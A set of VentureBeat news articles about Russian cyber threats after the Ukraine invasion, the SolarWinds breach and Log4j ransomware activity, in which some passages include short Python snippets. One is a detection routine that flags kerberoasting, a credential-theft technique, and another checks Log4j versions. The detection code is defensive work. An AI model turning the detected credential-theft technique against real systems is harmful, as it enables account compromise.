Today, several large Russian banks were removed from SWIFT in a move coordinated by the U.S. and the European Commission, as well as by the U.K., France, Germany, Italy and Canada. SWIFT, which stands for Society for Worldwide Interbank Financial Telecommunication, is a messaging system that enables banks to transact with each other internationally. The move essentially prevents the Russian banks from carrying out international transactions, according to reports. While seen as a necessary step to penalize Putin for his invasion of Ukraine — already responsible for at least hundreds of casualties, including Ukrainian civilians — the move nevertheless raises the likelihood that Putin will respond against the west, including potentially with a wave of cyberattacks. Previously, expelling Russian banks from SWIFT had been characterized by some as the "last resort" and the "nuclear option."

"Putin/Russia [is] getting completely isolated economically & diplomatically," wrote Dmitri Alperovitch, cofounder and former CTO of CrowdStrike and a Russian expat, in a tweet today. "The danger: Putin has very little to lose now. He is cornered. May go all out on economic and cyber retaliation," wrote Alperovitch, who is now executive chairman at the Silverado Policy Accelerator think tank.

'Shields up'

The expulsion from SWIFT is a "significant escalation from the initial sanctions announced on Thursday," said Rick Holland, CISO at Digital Shadows, in an email.
"The SWIFT removal significantly increases the risks of state-executed or state-encouraged Russian cyberattacks against the West," Holland said. Before the announcement, he noted, ransomware groups including Conti and CoomingProject had pledged to aid Russia from a cyber perspective in its efforts over Ukraine. "If Russia encourages or even incents cybercriminal targeting against Western companies, the threat level increases dramatically," Holland said. "There is also a risk of a potential escalatory spiral if the U.S. retaliates against these attacks." Ultimately, "as the Cybersecurity and Infrastructure Security Agency (CISA) says, we need 'Shields Up' right now — because the cyber threat level for the financial and energy sectors, in particular, is perhaps the highest it has been in years," he said.

In the past, many in the west have assumed that Putin would stop short of unleashing the full brunt of his cyber capabilities on the west over Ukraine. "I originally believed that Putin was a rational actor that wouldn't want to launch major cyberattacks in the U.S., as that would provoke similar attacks in response," Byres said. "After all, his goal was to subdue Ukraine, not the U.S." However, "after reading the full translation of his speech on Tuesday, reviewing the commentary from a number of Russian political analysts and talking to cyber analysts looking at known intrusions in the U.S., I'm not so sure anymore," Byres said. "I worry that Putin believes he is bulletproof and the U.S. is weak." Putin has made it clear that the entire western world is his enemy and all options are on the table, according to Byres.

Ukraine's 'IT army'

Meanwhile, cyber efforts in Ukraine itself appeared to advance further on Saturday.
Mykhailo Fedorov, Ukraine's vice prime minister, announced on Twitter, "We are creating an IT army." "We need digital talents," wrote Fedorov, who also holds the title of minister of digital transformation, sharing a link to a Telegram channel where he said operational tasks will be distributed. "We continue to fight on the cyber front."

Anonymous is the most visible group to pledge a cyber offensive against Russia on behalf of Ukraine, but some of the most sophisticated hacker groups are known to avoid attention as much as possible — including some that are believed to be aligned with the U.S. and western countries. On Friday, Christian Sorensen, a former U.S. Cyber Command official, told VentureBeat that "hacktivists around the world [will be] working against Russia, because they are the aggressor." "I think things will ramp up against western targets, but Russia and Belarus will be targeted by these groups even more," said Sorensen, formerly the operational planning team lead for the U.S. Cyber Command.
15,149
2,022
"Should U.S. launch a cyberattack offensive against Russia? Cyber experts are mixed | VentureBeat"
"https://venturebeat.com/2022/02/24/should-u-s-launch-a-cyberattack-offensive-against-russia-cyber-experts-are-mixed"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Should U.S. launch a cyberattack offensive against Russia? Cyber experts are mixed Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. While the U.S. will not be sending in troops in response to Russia’s unprovoked invasion of Ukraine, NBC News reported that advisers have presented U.S. President Joe Biden with options for “massive cyberattacks” aimed at disrupting Russia’s military efforts. The report published today, which cited four sources familiar with the matter, was dismissed by a White House spokesperson. However, the NBC News report itself specified that cyberattacks would be either covert or clandestine military operations, and the U.S. would never publicly acknowledge the activities. The proposals include the use of U.S. “cyberweapons” in an unprecedented manner — “on a scale never before contemplated” — to target Russia’s military, according to the NBC News report. Agencies including U.S. 
Cyber Command, the NSA and the CIA would be among those with a role in the operation, according to the report. Mixed responses In comments to VentureBeat on Thursday, cybersecurity experts provided a range of perspectives on the idea, from cautious support of the general concept to wariness — due in part to concerns about whether U.S. cybersecurity defenses would be up to the challenge of a cyber escalation involving Russia. Hitesh Sheth, president and CEO at Vectra, said that it’s “imperative” that the U.S. “consider offensive options” in this situation. However, “going on the offensive without the right technology to defend ourselves in cyber space would be bad strategy,” Sheth said. And given the challenges of executing strong cybersecurity across critical infrastructure in the U.S., a retaliation by Russia could have “devastating” impacts on services that Americans depend on, said John Hellickson, field CISO and executive advisor at Coalfire. “We have a lot of work yet to do here at home to ensure such retaliatory attacks could be sufficiently thwarted, as evidenced by very public ransomware and similar attacks recently,” Hellickson said. “I believe we need to avoid crossing the line of such considerations, as it’s difficult to predict the impacts of a likely retaliation.” It’s of course no secret that Russia already wages cyber warfare against the U.S. on a regular basis, said Leo Pate, managing consultant at nVisium. And “just because one country invades another, doesn’t mean a new call-to-action needs to be proclaimed,” Pate said. ‘Creative ways’ Christian Sorensen, former operational planning team lead for the U.S. 
Cyber Command, said that “there are definitely creative ways that cyber could be used to have an impact on Russia.” “This creativity brings new options,” said Sorensen, who is now founder and CEO of cybersecurity firm SightGain. “However, we have to be careful because: cyber is ambiguous in attribution and perception, somewhat unpredictable in impact, and therefore very hard to predict response especially since Russia does not use the same playbook.” Ultimately, “I have confidence that our strategy and policy approach will be informed and deliberate in response to the situation,” he said. Cyber operations are a “low-cost way to inflict inconvenience” on an adversary, said John Bambenek, principal threat hunter at Netenrich. “But in the absence of conventional military force, it will, at best, slow Russia down,” Bambenek said. “This provides the opportunity to look like we are ‘doing something,’ without the consequences of doing what would be effective to counter this invasion.” Starting a cyberwar? Danielle Jablanski, OT cybersecurity strategist at Nozomi Networks, said that even the “most well-informed intelligence professionals and war planners still do not know what escalation looks like in an unprecedented exchange of cyber warfare.” “Any cyber operation to counter Russian military aggression in Ukraine that wants to avoid encouraging Putin to take more drastic steps cannot threaten the lives and safety of innocent civilians,” Jablanski said. 
“Cyber weapons might include zero day exploits and the potential to impose high costs on an adversary, but they also potentially lead to unintended consequences which might not be justifiable if unprovoked.” Hellickson added that “although it would be interesting to see the true capabilities of the U.S. Cyber Command and supporting agencies in response to the Russian invasion of Ukraine, launching a cyberattack would take it to a whole new level while setting a dangerous precedent going forward.” Ultimately, it would raise the question, “Would this cyberattack be considered a direct act of war?” he said. ‘Menu of options’ The NBC News report, which indicated that Biden has a “menu of options” for intervening with cyberattacks against Russia on Ukraine’s behalf, is not accurate, a White House spokesperson said Thursday. “This report on cyber options being presented to @POTUS is off base and does not reflect what is actually being discussed in any shape or form,” said White House press secretary Jen Psaki on Twitter. However, Sam Curry, CSO at Cybereason, said it wouldn’t be surprising if President Biden’s top advisors really had presented him with a variety of options to consider, including cyber counterstrikes. “Counterstriking is within the power of the government — and simply saying it forces the stakes higher for Putin and Russia,” Curry said. While aimed at disrupting military operations, the proposed cyberattacks would impact more than just the military, NBC News reported. The options include disruption of internet connectivity throughout Russia, a shutdown of electric power and even “tampering with railroad switches to hamper Russia’s ability to resupply its forces,” several of the sources told NBC News. 
Three of the four sources cited in the report are said to be part of the intelligence community. Additionally, according to the report, these options aren’t only meant for use if Russia launches cyberattacks against the U.S. — as the Department of Homeland Security warned about weeks ago. The options include a “preemptive” cyber strike against Russia in response to the country’s unprovoked assault on its neighbor Ukraine, NBC News reported. Notably, the cyberattacks that are being considered would be intended only for disruption — rather than destruction — of any Russian systems or infrastructure, which would keep the attacks from meeting the definition of an “act of war,” according to the report. Cyberwarfare already under way Russian cyber offensives have already been playing a role in the country’s build-up to its assault this week. Authorities in the U.S. and U.K. blamed Russia for last week’s massive distributed denial-of-service (DDoS) attacks in Ukraine. Fresh DDoS attacks, as well as destructive cyberattacks that involved wiper malware, struck Ukraine on Wednesday just ahead of the invasion. The attacks — which researchers say included ransomware as a possible decoy or distraction in some instances — have notably also impacted machines in the NATO countries of Lithuania and Latvia, according to Symantec researchers. In remarks at the White House today, Biden cited the cyberattacks as among the activities that led up to the Russian invasion. Biden also reiterated a statement he’d made last week, saying that “if Russia pursues cyberattacks against our companies, our critical infrastructure, we are prepared to respond.” “For months, we’ve been working closely with the private sector to harden our cyber defenses, sharpen our ability to respond to the Russian cyberattacks,” Biden said in the remarks today. The address also included an announcement of new sanctions against Russian financial institutions and individuals. 
Russian retaliation In his address prior to the invasion, Russian President Vladimir Putin had threatened that “whoever tries to interfere with us … should know that Russia’s response will be immediate and will lead you to such consequences that you have never experienced in your history.” Russia has “multiple options at its disposal to initiate cyber warfare against the U.S. and its western allies. Any attack could seriously impact our critical infrastructures,” said Eric Byres, CTO of aDolus Technology. “The simplest action at Putin’s disposal is to take the muzzle off the ransomware actors operating out of Russia. The last few months have been suspiciously quiet in terms of ransomware activity, and I suspect that was deliberate,” Byres said. “Moscow could now subtly message the ransomware community that it is open season and then sit back to watch the chaos. This strategy also has the advantage of deniability: it is hard to prove a ransomware attack has been sanctioned by the Russian government.” Beyond that, Moscow could also take a more active approach in cyberattacks, “as we’ve seen in Georgia, Ukraine and the world in general,” he said. “Both Russia and its ransomware-proxies have become proficient in both software supply chain attacks and OT-focused attacks. These are likely to be the next wave of a coordinated Russian cyber/military offensive.” As of this writing, no cyberattacks suspected of being connected to the invasion of Ukraine have been reported to have impacted the U.S. or Western European countries. 
"
15,150
2,022
"'Reckless cowboy': U.S. may underestimate Putin's cyber strategy | VentureBeat"
"https://venturebeat.com/2022/02/25/reckless-cowboy-u-s-may-underestimate-putins-cyber-strategy"
"‘Reckless cowboy’: U.S. may underestimate Putin’s cyber strategy Cybersecurity veteran Eric Byres says that with Russia’s invasion of Ukraine this week, a lot has changed about his view of Vladimir Putin’s potential cyberattack strategy against the U.S. and other Western nations. And not in a good way. Byres, who’s spent decades in the security industry and is now CTO of aDolus Technology, a provider of operational technology (OT) software supply chain security, has been watching the actions and statements of Putin closely. His goal has been to figure out what all of this might say about Russia’s potential for launching cyberattacks against the West in connection with Ukraine. 
And similar to the way that many experts did not expect Russia to actually embark on a full-on military invasion of Ukraine, Byres says that the cyber industry may be underestimating what Putin is actually willing to do from a cyber perspective. While it is known industry-wide that Russia and government-linked groups have a significant cyber offense capability — it’s one of the biggest drivers for the security industry, after all — many in the West have assumed that Putin would stop short of unleashing the full brunt of these forces on the U.S. That assessment might be dangerously wrong, Byres warns. “I originally believed that Putin was a rational actor that wouldn’t want to launch major cyberattacks in the U.S., as that would provoke similar attacks in response,” Byres said. “After all, his goal was to subdue Ukraine, not the U.S.” However, “after reading the full translation of his speech on Tuesday, reviewing the commentary from a number of Russian political analysts and talking to cyber analysts looking at known intrusions in the U.S., I’m not so sure anymore,” Byres said. “I worry that Putin believes he is bulletproof and the U.S. is weak.” ‘Could be very bad’ Ultimately, “we could have a repeat of the thinking in Japan before Pearl Harbor,” Byres said. “If so, the West could be underestimating how much of a reckless cowboy he is — and that could be very bad.” Putin has made it clear that the entire Western world is his enemy and all options are on the table, according to Byres. In his speech on Thursday, for instance, Putin said that “I would now like to say something very important for those who may be tempted to interfere in these developments from the outside. 
No matter who tries to stand in our way or all the more so create threats for our country and our people, they must know that Russia will respond immediately, and the consequences will be such as you have never seen in your entire history.” In other words, “any country and its infrastructure is fair game for a cyberattack if Russia runs into significant resistance in Ukraine. I don’t think that this will be limited to companies directly dealing with Ukraine,” said Byres, previously the inventor of Tofino security technology, a widely deployed firewall for industrial control systems (ICS). Russian cyber offensives have already been playing a role in the country’s build-up to its assault on Ukraine this week. Authorities in the U.S. and U.K. blamed Russia for last week’s massive distributed denial-of-service (DDoS) attacks in Ukraine. Fresh DDoS attacks, as well as destructive cyberattacks that involved wiper malware, struck Ukraine on Wednesday just ahead of the invasion. U.S. cyber options As far as the U.S. goes, while the country will not be sending in troops in response to Russia’s unprovoked invasion of Ukraine, NBC News reported Thursday that advisers have presented U.S. President Joe Biden with options for “massive cyberattacks” aimed at disrupting Russia’s military efforts. The report, which cited four sources familiar with the matter, was dismissed by a White House spokesperson. However, the NBC News report itself specified that cyberattacks would be either covert or clandestine military operations, and the U.S. would never publicly acknowledge the activities. The proposals include the use of U.S. “cyberweapons” in an unprecedented manner — “on a scale never before contemplated” — to target Russia’s military, according to the NBC News report. Agencies including U.S. 
Cyber Command, the NSA and the CIA would be among those with a role in the operation, according to the report. In comments to VentureBeat on Thursday, cybersecurity experts provided a range of perspectives on the idea, from cautious support of the general concept to wariness — due in part to concerns about whether U.S. cybersecurity defenses would be up to the challenge of a cyber escalation involving Russia. Hitesh Sheth, president and CEO at Vectra, said that it’s “imperative” that the U.S. “consider offensive options” in this situation. However, “going on the offensive without the right technology to defend ourselves in cyberspace would be bad strategy,” Sheth said. And given the challenges of executing strong cybersecurity across critical infrastructure in the U.S., a retaliation by Russia could have “devastating” impacts on services that Americans depend on, said John Hellickson, field CISO and executive advisor at Coalfire. “We have a lot of work yet to do here at home to ensure such retaliatory attacks could be sufficiently thwarted, as evidenced by very public ransomware and similar attacks recently,” Hellickson said. “I believe we need to avoid crossing the line of such considerations, as it’s difficult to predict the impacts of a likely retaliation.” "
15,151
2,021
"Top lesson from SolarWinds attack: Rethink identity security | VentureBeat"
"https://venturebeat.com/2021/11/18/top-lesson-from-solarwinds-attack-rethink-identity-security"
"Top lesson from SolarWinds attack: Rethink identity security Credit: REUTERS/Brendan McDermid Among the many lessons from the unprecedented SolarWinds cyberattack, there’s one that most companies still haven’t quite grasped: Identity infrastructure itself is a prime target for hackers. That’s according to Gartner’s Peter Firstbrook, who shared his view on the biggest lessons learned about the SolarWinds Orion breach at the research firm’s Security & Risk Management Summit — Americas virtual conference this week. The SolarWinds attack — which is nearing the one-year anniversary of its disclosure — has served as a wake-up call for the industry due to its scope, sophistication, and method of delivery. 
The attackers compromised the software supply chain by inserting malicious code into the SolarWinds Orion network monitoring application, which was then distributed as an update to an estimated 18,000 customers. The breach long went undetected. The attackers, who’ve been linked to Russian intelligence by U.S. authorities, are believed to have had access for nine months to “some of the most sophisticated networks in the world,” including cybersecurity firm FireEye, Microsoft, and the U.S. Treasury Department, said Firstbrook, a research vice president and analyst at Gartner. Other impacted federal agencies included the Departments of Defense, State, Commerce, and Homeland Security. Firstbrook spoke about the SolarWinds attack, first disclosed on December 13, 2020, by FireEye, during two talks at the Gartner summit this week. The identity security implications of the attack should be top of mind for businesses, he said during the sessions, which included a Q&A session with reporters. Focus on identity When asked by VentureBeat about his biggest takeaway from the SolarWinds attack, Firstbrook said the incident demonstrated that “the identity infrastructure is a target.” “People need to recognize that, and they don’t,” he said. “That’s my biggest message to people: You’ve spent a lot of money on identity, but it’s mostly how to let the good guys in. You’ve really got to spend some money on understanding when that identity infrastructure is compromised, and maintaining that infrastructure.” Firstbrook pointed to one example where the SolarWinds hackers were able to bypass multifactor authentication (MFA), which is often cited as one of the most reliable ways to prevent an account takeover. The hackers did so by stealing a web cookie, he said. 
This was possible because out-of-date technology was being used and classified as MFA, according to Firstbrook. “You’ve got to maintain that [identity] infrastructure. You’ve got to know when it’s been compromised, and when somebody has already got your credentials or is stealing your tokens and presenting them as real,” he said. Digital identity management is notoriously difficult for enterprises, with many suffering from identity sprawl—including human, machine, and application identities (such as in robotic process automation). A recent study commissioned by identity security vendor One Identity revealed that nearly all organizations — 95% — report challenges in digital identity management. The SolarWinds attackers took advantage of this vulnerability around identity management. During a session with the full Gartner conference on Thursday, Firstbrook said that the attackers were in fact “primarily focused on attacking the identity infrastructure” during the SolarWinds campaign. Other techniques that were deployed by the attackers included theft of passwords that enabled them to elevate their privileges (known as kerberoasting); theft of SAML certificates to enable identity authentication by cloud services; and creation of new accounts on the Active Directory server, according to Firstbrook. Moving laterally Thanks to these successes, the hackers were at one point able to use their presence in the Active Directory environment to jump from the on-premises environment where the SolarWinds server was installed and into the Microsoft Azure cloud, he said. “Identities are the connective tissue that attackers are using to move laterally and to jump from one domain to another domain,” Firstbrook said. Identity and access management systems are “clearly a rich target opportunity for attackers,” he said. 
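Firstbrook's advice to watch the identity infrastructure for known attack techniques can be made concrete. Kerberoasting, mentioned above, typically leaves a trace in Windows Security logs: a burst of Kerberos service-ticket requests (Event ID 4769) asking for the legacy RC4-HMAC encryption type (0x17). A minimal triage sketch, assuming events have already been exported as dicts — the field names and threshold here are illustrative assumptions, not a real export schema or any vendor's detection logic:

```python
# Hypothetical sketch: flag possible kerberoasting from exported
# Windows Security events. Event ID 4769 is a Kerberos service-ticket
# request; repeated requests for RC4-HMAC tickets (encryption type
# 0x17) from an ordinary user account are a classic signal.
# Field names ("event_id", "account_name", ...) are illustrative.

RC4_HMAC = 0x17

def flag_kerberoasting(events, threshold=5):
    """Return accounts requesting many RC4-encrypted service tickets."""
    counts = {}
    for ev in events:
        if ev.get("event_id") != 4769:
            continue
        if ev.get("ticket_encryption_type") != RC4_HMAC:
            continue
        user = ev.get("account_name", "")
        if user.endswith("$"):  # skip machine accounts
            continue
        counts[user] = counts.get(user, 0) + 1
    return {u: n for u, n in counts.items() if n >= threshold}

events = (
    [{"event_id": 4769, "ticket_encryption_type": 0x17,
      "account_name": "jdoe"} for _ in range(6)]
    + [{"event_id": 4769, "ticket_encryption_type": 0x12,  # AES, ignored
        "account_name": "asmith"}]
)
print(flag_kerberoasting(events))  # {'jdoe': 6}
```

In practice such a check would run inside a SIEM against live event streams, and an AES-only environment could treat any RC4 request as suspect rather than applying a count threshold.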
Microsoft recently published details on another attack that’s believed to have stemmed from the same Russia-linked attack group, Nobelium, which involved an implant for Active Directory servers, Firstbrook said. “They were using that implant to infiltrate the Active Directory environment — to create new accounts, to steal tokens, and to be able to move laterally with impunity — because they were an authenticated user within the environment,” he said. Tom Burt, a corporate vice president at Microsoft, said in a late October blog post that a “wave of Nobelium activities this summer” included attacks on 609 customers. There were nearly 23,000 attacks on those customers between July 1 and Oct. 19, “with a success rate in the low single digits,” Burt said in the post. Monitoring identity infrastructure A common question in the wake of the SolarWinds breach, Firstbrook said, is how do you prevent a supply chain attack from impacting your company? “The reality is, you can’t,” he said. While companies should perform their due diligence about what software to use, of course, the chances of spotting a malicious implant in another vendor’s software are “extremely low,” Firstbrook said. What companies can do is prepare to respond in the event that happens, and a central part of that is closely monitoring identity infrastructure, he said. “You want to monitor your identity infrastructure for known attack techniques — and start to think more about your identity infrastructure as being your perimeter,” Firstbrook said. 
"
15,152
2,021
"Log4j flaw gets big attention from 'ruthless' ransomware gang | VentureBeat"
"https://venturebeat.com/2021/12/22/log4j-flaw-gets-big-attention-from-ruthless-ransomware-gang"
"Log4j flaw gets big attention from ‘ruthless’ ransomware gang The prominent ransomware gang Conti has expanded its efforts to exploit the Apache Log4j vulnerability, likely seeing the widespread flaw as the basis for a new wave of attacks, according to security researchers. Researchers at cybersecurity firms Qualys and AdvIntel told VentureBeat that they’ve observed activities by Conti to exploit the critical vulnerability in Log4j logging software, known as Log4Shell, in recent days. Qualys has observed “attempted ransomware attacks, some of which have been successful — by Conti, Khonsari, and some nation-state-backed adversaries,” said Travis Smith, director of malware threat research at Qualys, in an email to VentureBeat. Specifics of the attacks were not disclosed. 
Meanwhile, AdvIntel shared findings with VentureBeat indicating that Conti has assembled a full attack chain around the Log4Shell vulnerability and has launched initial attempted attacks. Late last week, AdvIntel became the first cyber firm to report spotting Conti in action around the Log4j vulnerability. So far, there’s been no public disclosure of a successful ransomware breach stemming from the Log4j vulnerability. But the widespread and trivial-to-exploit flaw in Log4j “is a dream come true for ransomware groups,” said Eyal Dotan, founder and chief technology officer at Cameyo, in an email. Full attack chain Khonsari, which was the first ransomware family publicly disclosed by researchers to exploit Log4Shell, has now been joined by the Conti and TellYouThePass families of ransomware, according to researchers. In its December 17 report, AdvIntel said that Conti has been observed exploiting the vulnerability in Log4j to gain access and move laterally on vulnerable VMware vCenter servers. Since publishing that report, AdvIntel has observed additional activities by Conti around Log4Shell, the company told VentureBeat. Along with identifying Conti’s full attack chain, “we have seen and observed the direct usage [by Conti] across different cases targeting VMware vCenter,” AdvIntel CEO Vitali Kremez said in an email. Conti’s attack chain includes deployment of the Emotet botnet and the use of Cobalt Strike for reconnaissance, privilege escalation, payload drop, and data-stealing operations, said Yelisey Boguslavskiy, head of research at AdvIntel, in an email to VentureBeat. “For Conti, this is a major leap in their offensive operations, as they can now experiment and diversify their arsenal,” Boguslavskiy said. 
“This means, if a certain attack vector, like VPN accesses, becomes less profitable, they can always compensate by investing more in Log4j. Additionally, it gives them another edge in competition with smaller groups who can not afford the proper research to exploit such vulnerabilities efficiently.” AdvIntel’s research on Conti’s activities was based on primary source intelligence, including victim breach intelligence and subsequent incident response, he said. In a statement responding to the AdvIntel report, VMware said that “the security of our customers is our top priority” and noted that it has issued a security advisory that is updated regularly. “Any service connected to the internet and not yet patched for the Log4j vulnerability (CVE-2021-44228) is vulnerable to hackers, and VMware strongly recommends immediate patching for Log4j,” the company said in the statement. ‘Ruthless’ organization Conti is believed to be a Russian ransomware group that formerly went by the name Wizard Spider. In a June report , Richard Hickman of Palo Alto Networks’ Unit 42 research group said that Conti “stands out as one of the most ruthless of the dozens of ransomware gangs that we follow.” “The group has spent more than a year attacking organizations where IT outages can have life-threatening consequences: hospitals, 911 dispatch carriers, emergency medical services, and law enforcement agencies,” Hickman wrote in the report. For instance, a May 2021 attack in Ireland “prompted the shutdown of the entire information technology network of the nation’s healthcare system – prompting cancellation of appointments, the shutdown of X-ray systems and delays in COVID testing,” he wrote. As of the June report, the FBI had found that more than 400 cyberattacks were connected to Conti—with three-fourths of the attacks against organizations based in the U.S. Ransom demands have reached upwards of $25 million, which also places Conti among the “greediest” ransomware groups, Hickman wrote. 
Sophisticated attacks Conti plays a significant role in today’s threat landscape due to its scale, Smith said. “Conti is always after ransomware and is incredibly strategic and tactical with their approach,” he said. “They do not simply send out a mass spray of phishing emails—they look to gain footholds in environments and move around as quietly as possible until they locate crown jewels.” Given that Log4Shell enables remote execution of code by unauthenticated users, “it’s going to make sophisticated actors such as Conti wildly successful,” Smith said. “It will allow groups to do reconnaissance, move laterally, and ultimately deploy ransomware.” Conti faces less of a challenge in how to exploit Log4j and more of a challenge in competing with other threat actors for available attack opportunities, Dotan said. “The fastest ransomware groups able to reach most vulnerable servers would be winning this race,” he said. And though major ransomware attacks deriving from Log4j have not yet come to light, that doesn’t mean that ransomware groups aren’t busy preparing. “If you are a ransomware affiliate or operator right now, you suddenly have access to all these new systems,” said Sean Gallagher, a senior threat researcher at Sophos Labs. “You’ve got more work on your hands than you know what to do with right now.” Preparations needed Still, while the Log4j vulnerability itself is considered very easy to exploit, a fair amount of legwork is required to utilize it for deploying ransomware. Post-exploitation discovery work needs to take place before a major ransomware attack can be launched, said Ed Murphy, head of product at Huntress. “It’s not a vulnerability that’s persistent across your and my laptop. So it’s not something I can just reach out and deploy a mass ‘spray and pray’ ransomware attack,” Murphy said in an interview. Log4j affects servers, and most ransomware operators will not want to just ransom a single server, which probably has backups, he noted. 
“Where they actually gain a lot of their income is by being able to affect an entire organization,” Murphy said. “That’s the kind of chaos where people are more willing to pay those ransom demands.” Thus, after an attacker lands on a server on a corporate network, they’ll first have to figure out what other devices they can “talk to” from that server, he said. Then, they’ll have to figure out what applications are running on those devices—and determine how to make their way from the server to laptops that are connected to it, Murphy said. This means that it might take some time before major ransomware attacks actually surface from the discovery of Log4Shell. “There’s activity that needs to happen after they’ve exploited the Log4j vulnerability to really gain more control over the network that they landed in,” Murphy said. Widespread vulnerability Many enterprise applications and cloud services written in Java are potentially vulnerable due to the flaws in Log4j prior to version 2.17, which was released last Friday. The open source logging library is believed to be used in some form—either directly or indirectly by leveraging a Java framework—by the majority of large organizations. Version 2.17 of Log4j is the third patch for vulnerabilities in the software since the initial discovery of a remote code execution (RCE) vulnerability on December 9. Security firm Check Point reported Monday it has observed attempted exploits of vulnerabilities in Log4j on more than 48% of corporate networks worldwide. The ransomware problem had already gotten much worse this year. For the first three quarters of 2021, SonicWall reported that attempted ransomware attacks surged 148% year-over-year. CrowdStrike reports that the average ransomware payment climbed by 63% in 2021, reaching $1.79 million. Attempted attacks against targets in the U.S. and Europe have been observed using ransomware from the TellYouThePass family, Sophos researchers told VentureBeat on Tuesday. 
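Triaging exposure to this flaw starts with comparing each bundled log4j-core version against the patched release. A minimal, illustrative sketch in Python — the 2.17 threshold comes from the text above, while the inventory format and helper names are hypothetical, and real remediation also had to track vendor backports for older Java runtimes:

```python
def parse_version(version: str) -> tuple:
    """Convert a dotted version string like '2.14.1' into a comparable tuple."""
    return tuple(int(part) for part in version.split("."))

def needs_log4j_patch(version: str, fixed: str = "2.17.0") -> bool:
    """True when a Log4j version predates the patched release named in the article."""
    return parse_version(version) < parse_version(fixed)

# Hypothetical inventory mapping service name -> bundled log4j-core version.
inventory = {"billing-service": "2.14.1", "auth-gateway": "2.17.0"}
flagged = sorted(name for name, v in inventory.items() if needs_log4j_patch(v))
print(flagged)  # ['billing-service']
```

In practice this comparison would run over a software bill of materials rather than a hand-written dictionary, since Log4j is often pulled in transitively by Java frameworks.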
Ransomware is just one of many major threats potentially posed by the Log4j vulnerability, however. There’s a higher, but less visible, danger related to Log4Shell, according to Dotan. And that is the existence of “sophisticated hacker groups and state-backed hackers who don’t intend to cash out on this opportunity right now,” he said. Instead, those threat actors would “rather install a backdoor and secretly take control over injected servers over the coming months, without their owners knowing about it,” Dotan said. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,153
2,022
"Major attacks using Log4j vulnerability 'lower than expected' | VentureBeat"
"https://venturebeat.com/2022/01/24/major-attacks-using-log4j-vulnerability-lower-than-expected"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Major attacks using Log4j vulnerability ‘lower than expected’ Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Thanks in large part to the massive response effort from the security community, there have been few cyber attacks of consequence leveraging the vulnerabilities in Apache Log4j so far, according to findings from cybersecurity giant Sophos. On the whole, successful attacks using the Log4j flaws have been limited, said Chester Wisniewski, principal research scientist at Sophos, in a blog today. Like other cyber vendors, the Sophos Managed Threat Response Team (MTR) has detected a large number of scans and attempts to use exploits for the remote code execution vulnerability, known as Log4Shell. But as of early January, “only a handful of MTR customers faced attempted intrusions where Log4j was determined to be the initial entry point,” Wisniewski wrote. Most of those intrusions were by cryptocurrency miners. 
“The overall number of successful attacks to date remains lower than expected,” he wrote. Still, the broad scope of the Log4Shell vulnerability, and the difficulty of finding all instances of it, suggest the bug “will likely be a target for exploitation for years to come,” Wisniewski wrote. Widespread vulnerability If unpatched, many enterprise applications and cloud services written in Java are potentially vulnerable to the flaws in Log4j. The open source logging library is believed to be used in some form — either directly or indirectly by leveraging a Java framework — by the majority of large organizations. The initial Log4j vulnerability, revealed on December 9, could be used to enable remote execution of code by unauthenticated users. However, “Sophos believes that the immediate threat of attackers mass exploiting Log4Shell was averted because the severity of the bug united the digital and security communities and galvanized people into action,” Wisniewski wrote. “This was seen back in 2000 with the Y2K bug, and it seems to have made a significant difference here.” Few major attacks using Log4j have been disclosed to date. On December 20, the defense ministry in Belgium disclosed that a portion of its network was shut down after a cyberattack. The attack had resulted from an exploitation of the vulnerability in Log4j, the defense ministry said. Cyber firm Qualys previously told VentureBeat it has observed “attempted ransomware attacks, some of which have been successful – by Conti, Khonsari, and some nation-state-backed adversaries,” said Travis Smith, director of malware threat research at Qualys, in an email. Specifics of the attacks were not disclosed. Disrupted attacks Other attacks that have been reported were disrupted midway through. 
For instance, on December 29, CrowdStrike said its threat hunters identified and disrupted an attack by a state-sponsored group based in China, which involved an exploit of the Log4j vulnerability. CrowdStrike said that threat hunters on its Falcon OverWatch team intervened to help protect a “large academic institution,” which wasn’t identified, from a hands-on-keyboard attack that appears to have used a modified Log4j exploit. In addition to the widespread response from the security community, another potential reason that mass exploitation has been kept to a minimum “could be the need to customize the attack to each application that includes the vulnerable Apache Log4J code,” Wisniewski wrote. Nonetheless, “just because we’ve steered round the immediate iceberg, that doesn’t mean we’re clear of the risk,” he said. “Some of the initial attack scans may have resulted in attackers securing access to a vulnerable target, but not actually abusing that access to deliver malware, for instance – so the successful breach remains undetected,” Wisniewski wrote. “Sophos believes that attempted exploitation of the Log4Shell vulnerability will likely continue for years and will become a favourite target for penetration testers and nation-state supported threat actors alike,” he wrote. “The urgency of identifying where it is used in applications and updating the software with the patch remains as critical as ever.” 